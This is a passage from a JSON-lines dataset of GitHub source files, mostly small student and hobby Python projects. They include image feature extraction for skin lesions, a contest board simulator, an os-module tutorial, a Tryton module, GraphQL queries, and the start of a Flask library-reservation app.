self.img[i].mean(axis=0).mean(axis=0)\n\n self.features.loc[self.data['image_id'] == im_id, ['average_red']] = average[0]\n self.features.loc[self.data['image_id'] == im_id, ['average_green']] = average[1]\n self.features.loc[self.data['image_id'] == im_id, ['average_blue']] = average[2]\n self.features.to_csv('features.csv', index=False)\n\n \"\"\"histogram of oriented gradients\"\"\"\n def hist_grad(self):\n self.features['histo_grad'] = 'default'\n hog = []\n for i in range(0, self.data.shape[0]):\n feature.hog(image, orientations=8, pixels_per_cell=(ppc, ppc), cells_per_block=(4, 4), block_norm='L2',\n visualise=True)\n hog.append(feature.hog(color.rgb2grey(self.img[i]), block_norm='L2-Hys'))\n\n \"\"\"skin-lesion-detection opencv\"\"\"\n def skin_lesion(self):\n self.features['area'] = 'default'\n self.features['area_variance01'] = 'default'\n self.features['area_variance02'] = 'default'\n self.features['area_variance03'] = 'default'\n self.features['area_variance1'] = 'default'\n self.features['area_variance2'] = 'default'\n self.features['area_variance3'] = 'default'\n self.features['average_blue'] = 'default'\n self.features['average_blue2'] = 'default'\n self.features['average_green'] = 'default'\n self.features['average_green2'] = 'default'\n self.features['average_red'] = 'default'\n self.features['average_red2'] = 'default'\n self.features['contrast2'] = 'default'\n self.features['correlation2'] = 'default'\n self.features['dissimilarity2'] = 'default'\n self.features['energy2'] = 'default'\n self.features['homogeneity2'] = 'default'\n self.features['m01'] = 'default'\n self.features['m02'] = 'default'\n self.features['m03'] = 'default'\n self.features['m10'] = 'default'\n self.features['m11'] = 'default'\n self.features['m12'] = 'default'\n self.features['m20'] = 'default'\n self.features['m21'] = 'default'\n self.features['m30'] = 'default'\n self.features['mu02'] = 'default'\n self.features['mu03'] = 'default'\n self.features['mu11'] = 'default'\n self.features['mu12'] = 'default'\n self.features['mu20'] = 'default'\n self.features['mu21'] = 'default'\n self.features['nu03'] = 'default'\n self.features['nu12'] = 'default'\n self.features['nu20'] = 'default'\n self.features['nu21'] = 'default'\n self.features['nu30'] = 'default'\n self.features['perimeter'] = 'default'\n self.features['symmetry'] = 'default'\n\n for i in range(0, self.data.shape[0]):\n im_id = self.data['image_id'][i]\n\n hsv = cv2.cvtColor(self.img[i], cv2.COLOR_BGR2HSV)\n gray = cv2.cvtColor(self.img[i], cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (17, 17), 32)\n ret, thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n self.im2.append(im2)\n cnt = max(contours, key=cv2.contourArea)\n if len(cnt) > 4:\n ellipse = cv2.fitEllipse(cnt)\n x, y, w, h = cv2.boundingRect(cnt)\n area = hsv[int(y + (0.3 * h)):int(y + (0.8 * h)), int((0.2 * w) + x):int((0.7 * w) + x)]\n ellipse_cnt = cv2.ellipse2Poly((int(ellipse[0][0]), int(ellipse[0][1])),\n (int(ellipse[1][0]), int(ellipse[1][1])), int(ellipse[2]), 0, 360, 1)\n\n # add average color information\n mask = thresh > 0\n red_sum = np.multiply(self.img[i][:, :, 0], mask).sum()\n green_sum = np.multiply(self.img[i][:, :, 1], mask).sum()\n blue_sum = np.multiply(self.img[i][:, :, 2], mask).sum()\n area_sum = mask.sum()\n\n # texture information\n gCoMat = feature.greycomatrix(gray, [2], [0], 256, symmetric=True, normed=True)\n\n # color without segmentation\n average = self.img[i].mean(axis=0).mean(axis=0)\n\n # add perimeter, symmetry and area variance\n perimeter = cv2.arcLength(cnt, True)\n comp = cv2.matchShapes(cnt, ellipse_cnt, 1, 0.0)\n variance = cv2.meanStdDev(area)\n\n # add moment information to dataframe\n moments = cv2.moments(cnt, True)\n\n self.features.loc[self.data['image_id'] == im_id, ['contrast2']] = feature.greycoprops(gCoMat, prop='contrast')\n self.features.loc[self.data['image_id'] == im_id, ['dissimilarity2']] = feature.greycoprops(gCoMat, prop='dissimilarity')\n self.features.loc[self.data['image_id'] == im_id, ['homogeneity2']] = feature.greycoprops(gCoMat, prop='homogeneity')\n self.features.loc[self.data['image_id'] == im_id, ['energy2']] = feature.greycoprops(gCoMat, prop='energy')\n self.features.loc[self.data['image_id'] == im_id, ['correlation2']] = feature.greycoprops(gCoMat, prop='correlation'),\n self.features.loc[self.data['image_id'] == im_id, ['average_red']] = red_sum / area_sum\n self.features.loc[self.data['image_id'] == im_id, ['average_green']] = green_sum / area_sum\n self.features.loc[self.data['image_id'] == im_id, ['average_blue']] = blue_sum / area_sum\n self.features.loc[self.data['image_id'] == im_id, ['average_red2']] = average[0]\n self.features.loc[self.data['image_id'] == im_id, ['average_green2']] = average[1]\n self.features.loc[self.data['image_id'] == im_id, ['average_blue2']] = average[2]\n self.features.loc[self.data['image_id'] == im_id, ['perimeter']] = perimeter\n self.features.loc[self.data['image_id'] == im_id, ['symmetry']] = comp\n self.features.loc[self.data['image_id'] == im_id, ['area_variance1']] = variance[1][0][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance2']] = variance[1][1][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance3']] = variance[1][2][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance01']] = variance[0][0][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance02']] = variance[0][1][0]\n self.features.loc[self.data['image_id'] == im_id, ['area_variance03']] = variance[0][2][0]\n self.features.loc[self.data['image_id'] == im_id, ['area']] = moments['m00']\n self.features.loc[self.data['image_id'] == im_id, ['m10']] = moments['m10']\n self.features.loc[self.data['image_id'] == im_id, ['m01']] = moments['m01']\n self.features.loc[self.data['image_id'] == im_id, ['m20']] = moments['m20']\n self.features.loc[self.data['image_id'] == im_id, ['m11']] = moments['m11']\n self.features.loc[self.data['image_id'] == im_id, ['m02']] = moments['m02']\n self.features.loc[self.data['image_id'] == im_id, ['m30']] = moments['m30']\n self.features.loc[self.data['image_id'] == im_id, ['m21']] = moments['m21']\n self.features.loc[self.data['image_id'] == im_id, ['m12']] = moments['m12']\n self.features.loc[self.data['image_id'] == im_id, ['m03']] = moments['m03']\n self.features.loc[self.data['image_id'] == im_id, ['mu20']] = moments['mu20']\n self.features.loc[self.data['image_id'] == im_id, ['mu11']] = moments['mu11']\n self.features.loc[self.data['image_id'] == im_id, ['mu02']] = moments['mu02']\n self.features.loc[self.data['image_id'] == im_id, ['mu03']] = moments['mu03']\n self.features.loc[self.data['image_id'] == im_id, ['mu21']] = moments['mu21']\n self.features.loc[self.data['image_id'] == im_id, ['mu12']] = moments['mu12']\n self.features.loc[self.data['image_id'] == im_id, ['mu03']] = moments['mu03']\n self.features.loc[self.data['image_id'] == im_id, ['nu20']] = moments['nu20']\n self.features.loc[self.data['image_id'] == im_id, ['nu30']] = moments['nu30']\n self.features.loc[self.data['image_id'] == im_id, ['nu21']] = moments['nu21']\n self.features.loc[self.data['image_id'] == im_id, ['nu12']] = moments['nu12']\n self.features.loc[self.data['image_id'] == im_id, ['nu03']] = moments['nu03']\n\n self.features.to_csv('data/features_test_set2.csv', index=False)\n\n \"\"\"features selection\"\"\"\n def feature_selection(self):\n # select training and validation set\n dev_im_id = pd.read_csv(self.dev_set_path)\n dev_indices = self.data.image_id.isin(dev_im_id.image)[lambda x: x]\n train_indices = self.data.image_id.isin(dev_im_id.image)[lambda x: ~x]\n self.train_features = self.features.drop(dev_indices.index)\n self.train_classes = self.classes.drop(dev_indices.index)\n self.dev_features = self.features.drop(train_indices.index)\n self.dev_classes = self.classes.drop(train_indices.index)\n\n # drop NAN values\n \"\"\"\n nan_indices = self.features.isna().any(axis=1)[lambda x: x]\n train_nan_indices = self.train_features.isna().any(axis=1)[lambda x: x]\n dev_nan_indices = self.dev_features.isna().any(axis=1)[lambda x: x]\n self.features.dropna(inplace=True)\n self.classes.drop(nan_indices.index, axis=0, inplace=True)\n self.train_features.dropna(inplace=True)\n self.train_classes.drop(train_nan_indices.index, axis=0, inplace=True)\n self.dev_features.dropna(inplace=True)\n self.dev_classes.drop(dev_nan_indices.index, axis=0, inplace=True)\n \"\"\"\n\n # first method: select k=10 best features with chi2-test\n # problem: choose of k beforehand\n \"\"\"\n chi_selector = SelectKBest(chi2, k=15).fit(features_norm, self.classes)\n chi_support = chi_selector.get_support()\n chi_feature_names = self.features.loc[:, chi_support].columns.tolist()\n chi_drop_names = self.features.loc[:, chi_support].columns.tolist()\n chi_features = chi_selector.transform(features_norm)\n print(chi_features.shape[1], 'chi-selected features', chi_feature_names)\n \"\"\"\n\n # drop features correlated with hair\n \"\"\"\n tested with augmented hair \n im_path = 'data/HairTest/'\n data_path = 'data/HairTest/data.csv'\n feature_path = None\n dev_set_path = None\n \"\"\"\n self.features.drop(['Moment_R_L02', 'Moment_R_L11', 'Moment_R_L12', 'Moment_R_L22',\n 'Moment_G_L02', 'Moment_G_L11', 'Moment_G_L12', 'Moment_G_L22',\n 'Moment_B_L02', 'Moment_B_L11', 'Moment_B_L12', 'Moment_B_L22',\n 'contrast', 'perimeter', 'area',\n 'area_variance1', 'area_variance2', 'area_variance3'], axis=1, inplace=True)\n\n # normalise features values\n features_norm = scale(MinMaxScaler().fit_transform(self.features))\n # other method: (L1)/L2-based feature selection with LinearSVC\n # use SVM as a sparse estimator to reduce dimensionality\n # reason: many of the estimated coefficients are zero\n # use C to control the sparsity: the smaller C the fewer features selected\n lsvc = LinearSVC(C=0.1, penalty=\"l2\", dual=False).fit(features_norm, np.ravel(self.classes))\n svc_selector = SelectFromModel(lsvc, prefit=True)\n svc_support = svc_selector.get_support()\n svc_feature_names = self.features.loc[:, svc_support].columns.tolist()\n svc_drop_names = self.features.loc[:, ~svc_support].columns.tolist()\n svc_features = svc_selector.transform(features_norm)\n print(svc_features.shape[1], 'svc-selected features: ', svc_feature_names)\n\n # according to what features to use, set self variables; here: scv_features\n self.features = svc_features\n self.train_features.drop(svc_drop_names, axis=1, inplace=True)\n self.train_features = scale(MinMaxScaler().fit_transform(self.train_features))\n self.dev_features.drop(svc_drop_names, axis=1, inplace=True)\n self.dev_features = scale(MinMaxScaler().fit_transform(self.dev_features))\n self.test_features.drop(svc_drop_names, axis=1, inplace=True)\n self.test_features = scale(MinMaxScaler().fit_transform(self.test_features))\n self.feature_names = svc_feature_names\n","repo_name":"ProjectSeminarISM/part1","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":19806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25278118782","text":"import time\r\nimport random\r\nimport copy\r\n\r\nVISUALIZE = True\r\n\r\ndef main():\r\n t_start = time.time()\r\n T_LIMIT = 3.0\r\n buf = input()\r\n buflist = buf.split()\r\n N = int(buflist[0]) # = 500\r\n M = int(buflist[1]) # = 29\r\n L = int(buflist[2]) # = 300\r\n S = []\r\n for i in range(N):\r\n buf = input()\r\n S.append(buf)\r\n # board initialization\r\n board = []\r\n for i in range(M):\r\n board.append(list(\".\" * M))\r\n for i in range(M):\r\n for j in range(M):\r\n if i == 0 or i == M - 1 or j == 0 or j == M - 1:\r\n board[i][j] = \"#\"\r\n # try to find best board with random panel placement\r\n PANEL_LIST = [\"#\", \"D\", \"T\", \"L\", \"R\", \".\"]\r\n WALL_CHANCE = 0.000\r\n DOUBLE_CHANCE = 0.00 + WALL_CHANCE\r\n TRIPLE_CHANCE = 0.00 + DOUBLE_CHANCE\r\n LEFT_CHANCE = 0.00 + TRIPLE_CHANCE\r\n RIGHT_CHANCE = 0.00 + LEFT_CHANCE\r\n NOTHING_CHANCE = 1.0\r\n PROB_LIST = [WALL_CHANCE, DOUBLE_CHANCE, TRIPLE_CHANCE, LEFT_CHANCE, RIGHT_CHANCE, NOTHING_CHANCE]\r\n best_board = copy.deepcopy(board)\r\n best_score = simulate_board(board, M, S)\r\n while True:\r\n new_board = copy.deepcopy(board)\r\n # randomly place panel\r\n for i in range(1, M-1):\r\n for j in range(1, M-1):\r\n roll = random.random()\r\n for k, prob in enumerate(PROB_LIST):\r\n if roll < prob:\r\n new_board[i][j] = PANEL_LIST[k]\r\n break\r\n for i in range(M):\r\n for j in range(M):\r\n if (i == 1 or i == M - 2 or j == 1 or j == M - 2) and not (i == 0 or i == M - 1 or j == 0 or j == M - 1):\r\n roll = random.random()\r\n if roll < 1.0:\r\n new_board[i][j] = \"R\"\r\n # wall is not allowed on center\r\n if new_board[(M - 1) // 2][(M - 1) // 2] == \"#\":\r\n new_board[(M - 1) // 2][(M - 1) // 2] = \".\" # remove wall\r\n # simulate board\r\n score = simulate_board(new_board, M, S)\r\n # is score higher than the best one?\r\n if score > best_score:\r\n best_score = score\r\n best_board = copy.deepcopy(new_board)\r\n # score and time visualization\r\n if VISUALIZE:\r\n print(score, T_LIMIT - abs(time.time() - t_start), flush=True)\r\n # finish if time left < 0.2 seconds\r\n if T_LIMIT - abs(time.time() - t_start) < 0.2:\r\n break\r\n # print final board\r\n for i in range(M):\r\n print(\"\".join(best_board[i]))\r\n if VISUALIZE:\r\n print(best_score)\r\n\r\ndef simulate_board(board, M, S):\r\n stop_count = []\r\n for i in range(M):\r\n stop_count.append([0] * M)\r\n for test_case in S:\r\n # initialize robot position\r\n x = (M - 1) // 2\r\n y = (M - 1) // 2\r\n direction = 0\r\n for command in test_case:\r\n # check for Double / Triple panel\r\n executions = 1\r\n if board[y][x] == \"D\":\r\n executions = 2\r\n elif board[y][x] == \"T\":\r\n executions = 3\r\n for execution in range(executions):\r\n # move forward\r\n if command == \"S\":\r\n if direction == 0: # up\r\n if not board[y-1][x] == \"#\": # check for a wall\r\n y -= 1\r\n elif direction == 1: # right\r\n if not board[y][x+1] == \"#\": # check for a wall\r\n x += 1\r\n elif direction == 2: # down\r\n if not board[y+1][x] == \"#\": # check for a wall\r\n y += 1\r\n elif direction == 3: # left\r\n if not board[y][x-1] == \"#\": # check for a wall\r\n x -= 1\r\n # turn left\r\n elif command == \"L\":\r\n if board[y][x] == \"R\": # check for Right panel\r\n direction = (direction + 1) % 4 # turn right instead\r\n else:\r\n direction = (direction - 1) % 4\r\n elif command == \"R\":\r\n if board[y][x] == \"L\": # check for Left panel\r\n direction = (direction - 1) % 4 # turn left instead\r\n else:\r\n direction = (direction + 1) % 4\r\n stop_count[y][x] += 1 # add stop count of final position\r\n # calculate final score\r\n score = 0\r\n for i in range(M):\r\n for j in range(M):\r\n if stop_count[i][j] == 1:\r\n score += 10\r\n elif stop_count[i][j] == 2:\r\n score += 3\r\n elif stop_count[i][j] == 3:\r\n score += 1\r\n return score\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"takumi152/atcoder","sub_path":"httf2019/httf2019.py","file_name":"httf2019.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11173025602","text":"# Santosh Khadka\n# What if we have to open every file in a directory?\n# What if we want to actually move files around on our computer?\n\nimport os # Allows for command line style commands\nimport shutil # Move files around\nimport send2trash # Delete files to resycle bin. pip install send2trash\nf = open(\"practice.txt\", 'w+')\nf.write(\"Santosh Khadka\")\nf.close()\n\nprint(os.getcwd()) # Works because of os\n# print(str(os.getcwd()).replace(\"\\\\\", \"\\\\\\\\\")) # Replace \\ with \\\\\n# print(os.listdir()) # same as ls command\n# print(os.listdir('C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\\\MINE\\\\learning_algos\\\\Learning-python')) # print all files in 'directory'\n# print(os.listdir('C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\MINE\\\\learning_algos\\\\Learning-python')) # Need to use \\\\ instead of \\\n \n# shutil.move('practice.txt', 'C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\\\MINE\\\\learning_algos\\\\Learning-python\\\\Section 14 - Advanced Python Modules\\\\end') # Error if specified file not found\n\n'''\nDeleting Files\n\nNOTE: The os module provides 3 methods for deleting files:\n\n os.unlink(path) which deletes a file at the path your provide\n os.rmdir(path) which deletes a folder (folder must be empty) at the path your provide\n shutil.rmtree(path) this is the most dangerous, as it will remove all files and folders contained in the path. \n \n All of these methods can not be reversed! Won't be able to recover the file. \n Instead use send2trash module: Safer alternative that sends deleted files to trash bin instead of permanent delete.\n \n send2trash: pip install send2trash \n'''\n# print('Before delete: ', os.listdir())\n# send2trash.send2trash('practice.txt') # can put the entire path or just the file name if in the same directory.\n# print('After delete: ', os.listdir())\n\n## Looks in given file path and outputs the name of all sub-folders and files in them\n## Can add in logic to find only folders/files you're looking for. Ex date, id, etc.\nfile_path = \"C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\\\MINE\\\\learning_algos\\\\Learning-python\\\\Section 14 - Advanced Python Modules\\\\start\"\nfor folder, sub_folders, files in os.walk(file_path):\n print(f\"\\nCurrently looking at {folder}\")\n print('Subfolders are: ')\n for folder in sub_folders:\n print(f\"Sub-folder: {folder}\")\n print(\"The files are: \")\n for items in files:\n print(f\"File: {items}\")\n","repo_name":"skhadka007/learning_algos","sub_path":"Learning-python/Section 14 - Advanced Python Modules/osModules.py","file_name":"osModules.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38439417221","text":"from trytond.pool import Pool, PoolMeta\nfrom trytond.model import fields\nfrom trytond.transaction import Transaction\n\n__all__ = ['SaleLine']\n\n\nclass SaleLine(metaclass=PoolMeta):\n __name__ = 'sale.line'\n\n @fields.depends('product')\n def on_change_product(self):\n Product = Pool().get('product.product')\n\n super(SaleLine, self).on_change_product()\n\n lang = Transaction().context.get('language')\n\n if self.product and self.product.description:\n # get party lang\n party_context = {}\n if self.sale and self.sale.party:\n party = self.sale.party\n if party.lang:\n party_context['language'] = party.lang.code\n\n # reload product by lang when is different party lang and user lang\n if party_context.get('language') and (lang != party_context['language']):\n with Transaction().set_context(party_context):\n self.description = Product(self.product.id).description\n else:\n self.description = self.product.description\n","repo_name":"NaN-tic/trytond-sale_description","sub_path":"sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5632559030","text":"from __future__ import division\n\nimport asyncio\nimport logging\nimport sys\nimport time\nimport uuid\n\nfrom thingserver import Action, Event, Property, Thing, Value, WebThingServer\n\nif (\n sys.version_info[0] == 3\n and sys.version_info[1] >= 8\n and sys.platform.startswith(\"win\")\n):\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n\n\nclass OverheatedEvent(Event):\n def __init__(self, thing, data):\n Event.__init__(self, thing, \"overheated\", data=data)\n\n\ndef make_thing():\n thing = Thing(\n \"urn:dev:ops:my-lamp-1234\",\n \"My Lamp\",\n [\"OnOffSwitch\", \"Light\"],\n \"A web connected lamp\",\n )\n\n thing.add_context(\"https://iot.mozilla.org/schemas\")\n\n on_property = Property(\n thing,\n \"on\",\n Value(True, None, lambda x: print(x)),\n metadata={\n \"@type\": \"OnOffProperty\",\n \"title\": \"On/Off\",\n \"type\": \"boolean\",\n \"description\": \"Whether the lamp is turned on\",\n },\n )\n\n brightness_property = Property(\n thing,\n \"brightness\",\n Value(50, None, lambda x: print(x)),\n metadata={\n \"@type\": \"BrightnessProperty\",\n \"title\": \"Brightness\",\n \"type\": \"integer\",\n \"description\": \"The level of light from 0-100\",\n \"minimum\": 0,\n \"maximum\": 100,\n \"unit\": \"percent\",\n },\n )\n\n thing.add_property(on_property)\n thing.add_property(brightness_property)\n\n async def fade_function(args):\n print(\"Starting fade function\")\n await asyncio.sleep(args[\"duration\"] / 1000)\n await brightness_property.set_value(args[\"brightness\"])\n print(\"Finished fade function\")\n return \"Return value\"\n\n fade_action = Action(\n thing,\n \"fade\",\n fade_function,\n metadata={\"title\": \"Fade\", \"description\": \"Fade the lamp to a given level\",},\n input_={\n \"type\": \"object\",\n \"required\": [\"brightness\", \"duration\",],\n \"properties\": {\n \"brightness\": {\n \"type\": \"integer\",\n \"minimum\": 0,\n \"maximum\": 100,\n \"unit\": \"percent\",\n },\n \"duration\": {\"type\": \"integer\", \"minimum\": 1, \"unit\": \"milliseconds\",},\n },\n },\n output={\"type\": \"string\"},\n )\n\n thing.add_action(fade_action)\n\n thing.add_available_event(\n \"overheated\",\n {\n \"description\": \"The lamp has exceeded its safe operating temperature\",\n \"type\": \"number\",\n \"unit\": \"degree celsius\",\n },\n )\n\n return thing\n\n\ndef run_server():\n thing = make_thing()\n\n server = WebThingServer(thing, port=8888, debug=True)\n try:\n logging.info(\"starting the server\")\n server.start()\n except KeyboardInterrupt:\n logging.info(\"stopping the server\")\n server.stop()\n logging.info(\"done\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=10, format=\"%(asctime)s %(filename)s:%(lineno)s %(levelname)s %(message)s\"\n )\n run_server()\n","repo_name":"labthings/python-thingserver","sub_path":"example/single-thing.py","file_name":"single-thing.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73293186292","text":"from graphene import (\r\n ObjectType,\r\n String,\r\n Boolean,\r\n List,\r\n Int,Date\r\n)\r\nfrom .persona import Persona as PersonaModel\r\nfrom .objects import Persona, Departamento,Vehiculo, Registro, Infraccion\r\nfrom .departamento import Departamento as DepartamentoModel\r\nfrom .vehiculo import Vehiculo as VehiculoModel\r\nfrom .registro import Registro as RegistroModel\r\nfrom .infraccion import Infraccion as InfraccionModel\r\n\r\nclass Query(ObjectType):\r\n personas = List(lambda: Persona, last_name=String(), id=Int(), has_email=Boolean(), order_by_name=Boolean())\r\n departamentos = List(lambda: Departamento)\r\n vehiculo = List(lambda: Vehiculo,patente=String(), categoria_vehiculo=String(),anio_fabricacion=Int(),nombre_propietario=String(),domicilio_propietario=String())\r\n registro = List (lambda:Registro,numero=Int(),nombre_chofer=String(),domicilio_chofer=String(),edad=Int(),grupo_sanguineo=String(),categoria=String(),fecha_emision=Date(),fecha_vencimiento=Date())\r\n infraccion = List (lambda : Infraccion,numero_infraccion=Int(),fecha_infraccion=Int(),observaciones=String(),patente=String())\r\n\r\n def resolve_personas(self, info, id=None, last_name=None, has_email=None, order_by_name=None):\r\n query = Persona (info=info)\r\n if id:\r\n query = query.filter(PersonaModel.id==id)\r\n if last_name:\r\n query = query.filter(PersonaModel.last_name==last_name)\r\n if has_email is not None:\r\n if has_email:\r\n query = query.filter(PersonaModel.email != None)\r\n else:\r\n query = query.filter(PersonaModel.email == None)\r\n if order_by_name:\r\n query = query.order_by(PersonaModel.name)\r\n return query.all()\r\n \r\n def resolve_departamentos(self, info):\r\n query = Departamento.get_query(info=info)\r\n return query.all()\r\n \r\n def resolve_vehiculo(self, info, patente=None, categoria_vehiculo=None, anio_fabricacion=None, nombre_propietario=None,domicilio_propietario=None):\r\n query = Vehiculo.get_query(info=info)\r\n if patente:\r\n query= query.filter(VehiculoModel.patente==patente)\r\n if categoria_vehiculo:\r\n query=query.filter(VehiculoModel.categoria_vehiculo==categoria_vehiculo)\r\n if anio_fabricacion:\r\n query= query.filter(VehiculoModel.anio_fabricacion==anio_fabricacion)\r\n if nombre_propietario:\r\n query= query.filter(VehiculoModel.nombre_propietario==nombre_propietario)\r\n if domicilio_propietario:\r\n query= query.filter(VehiculoModel.domicilio_propietario==domicilio_propietario)\r\n return query.all()\r\n \r\n def resolve_registro(self, info,numero=None,nombre_chofer=None,domicilio_chofer=None,edad=None,grupo_sanguineo=None,categoria=None,fecha_emision=None,fecha_vencimiento=None):\r\n query = Registro.get_query (info=info)\r\n if numero:\r\n query=query.filter(RegistroModel.numero==numero)\r\n if nombre_chofer:\r\n query=query.filter(RegistroModel.nombre_chofer==nombre_chofer)\r\n if edad:\r\n query=query.filter(RegistroModel.edad==edad)\r\n if grupo_sanguineo:\r\n query=query.filter(RegistroModel.grupo_sanguineo==grupo_sanguineo)\r\n if fecha_emision:\r\n query=query.filter(RegistroModel.fecha_emision==fecha_emision)\r\n if fecha_vencimiento:\r\n query=query.filter(RegistroModel.fecha_vencimiento==fecha_vencimiento)\r\n return query.all()\r\n \r\n def resolve_infraccion(self, info,numero_infraccion=None,fecha_infraccion=None,observaciones=None,patente=None):\r\n query = Infraccion.get_query (info=info)\r\n if numero_infraccion:\r\n query=query.filter(InfraccionModel.numero_infraccion==numero_infraccion)\r\n if fecha_infraccion:\r\n query=query.filter(InfraccionModel.fecha_infraccion==fecha_infraccion)\r\n if patente:\r\n query:query.filter(InfraccionModel.patente==patente)\r\n return query.all()\r\n","repo_name":"MagaliLandini/Back","sub_path":"base de dato/models/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"284379043","text":"#!/usr/bin/python\n\"\"\"Let's have us some base64 for simple integer keys.\"\"\"\n\nfrom math import log, floor\n\n# Completely bikeshedded base64 character set, aimed at maximal\n# typability.\ncharset = '.abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-'\n\ndef encode64(number):\n if number == 0:\n return charset[0]\n text = ''\n width = int(floor(log(number, 64)))\n for power in xrange(width, -1, -1):\n place_value = number / 64**power\n text += charset[place_value]\n number -= place_value * 64**power\n return text\n\ndef decode64(text):\n number = 0\n for power in xrange(len(text) - 1, -1, -1):\n place_value = charset.index(text[len(text) - power - 1])\n number += place_value * 64**power\n return number\n","repo_name":"cryogen/yardbird","sub_path":"yardbird/contrib/shortener.py","file_name":"shortener.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41726481462","text":"def biodata(nama, alamat, tanggal, umur, bb, tb):\n\n meter = tb / 100\n bmi = bb / (meter * meter)\n\n if bmi < 18.5:\n ideal = 'Kurus'\n elif bmi <= 24.9:\n ideal = 'Normal'\n else:\n ideal = 'Gemuk'\n\n return f'''\n =================\n ===> Biodata <===\n =================\n\n Nama : {nama}\n Alamat : {alamat}\n Tanggal : {tanggal}\n Usia : {str(umur)}\n Tinggi Badan : {str(tb)} cm\n Berat badan : {str(bb)}kg - {ideal}\n '''\n\n\nprint(\n biodata('Febry Billiyagi Karsidi',\n 'Jl.Pabrik Kulit RT05/RW03, Cibinong - Bogor', '19 Februari 2003',\n 19, 51, 170))\n","repo_name":"billiyagi/myPython","sub_path":"DDP Tugas 9/biodata.py","file_name":"biodata.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9408512030","text":"import os\n\nfrom cs50 import SQL\nfrom flask import Flask, redirect, render_template, request, session\nfrom flask_mail import Mail, Message\n\nfrom flask_session import Session\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom helpers import login_required, apology, send_reservation_details, admin_access_required, generate_qrcode_for_reservation\nfrom datetime import datetime, timedelta\n\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\n\n# Configure administator's mail\napp.config['MAIL_SERVER']= 'smtp.poczta.onet.pl'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USERNAME'] = str(os.environ['admin_email'])\napp.config['MAIL_PASSWORD'] = str(os.environ['admin_password'])\napp.config['MAIL_USE_TLS'] = False\nmail = Mail(app)\n\nSession(app)\n\n# Configure CS50 Library to use SQLite database called library.db\ndb = SQL(\"sqlite:///library.db\")\n\nMAX_AMOUNT_OF_CHARACTERS = 1000\nMAX_AMOUNT_OF_RESERVATIONS = 5\n\n@app.after_request\ndef after_request(response):\n \"\"\"Ensure responses aren't cached\"\"\"\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n# Admin's backend!\n\n@app.route(\"/admin\")\n@login_required\n@admin_access_required\ndef homepage_admin():\n return render_template(\"home_admin.html\")\n\n@app.route(\"/books_admin\")\n@login_required\n@admin_access_required\ndef books_admin():\n \"\"\"Render all books from library collection\"\"\"\n books = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books\")\n occupied_books = db.execute(\n \"SELECT books.book_id, title, description, genre, photo_adress FROM books INNER JOIN reservations ON books.book_id=reservations.book_id WHERE books.book_id IN (SELECT reservations.book_id FROM reservations)\")\n occupied_books_ids_only = []\n for occupied_book in occupied_books:\n occupied_books_ids_only.append(occupied_book[\"book_id\"])\n return render_template(\"books_admin.html\", books=books, occupied_books_ids_only=occupied_books_ids_only)\n\n\n@app.route(\"/admin_search_books\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_search_books():\n \"\"\"Search through all books from library collection\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"search_type_books\") or not request.form.get(\"ID\"):\n return redirect(\"/books_admin\")\n search_type = request.form.get(\"search_type_books\")\n search_id_title = request.form.get(\"ID\")\n if search_type == \"Book\":\n books = db.execute(\"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id = ?\", search_id_title)\n return render_template(\"books_admin.html\", books=books)\n elif search_type == \"Title\":\n sql_search_id_title = \"%\" + search_id_title + \"%\"\n books = db.execute(f\"SELECT book_id, title, description, genre, photo_adress FROM books WHERE title LIKE ?\", sql_search_id_title)\n return render_template(\"books_admin.html\", books=books)\n 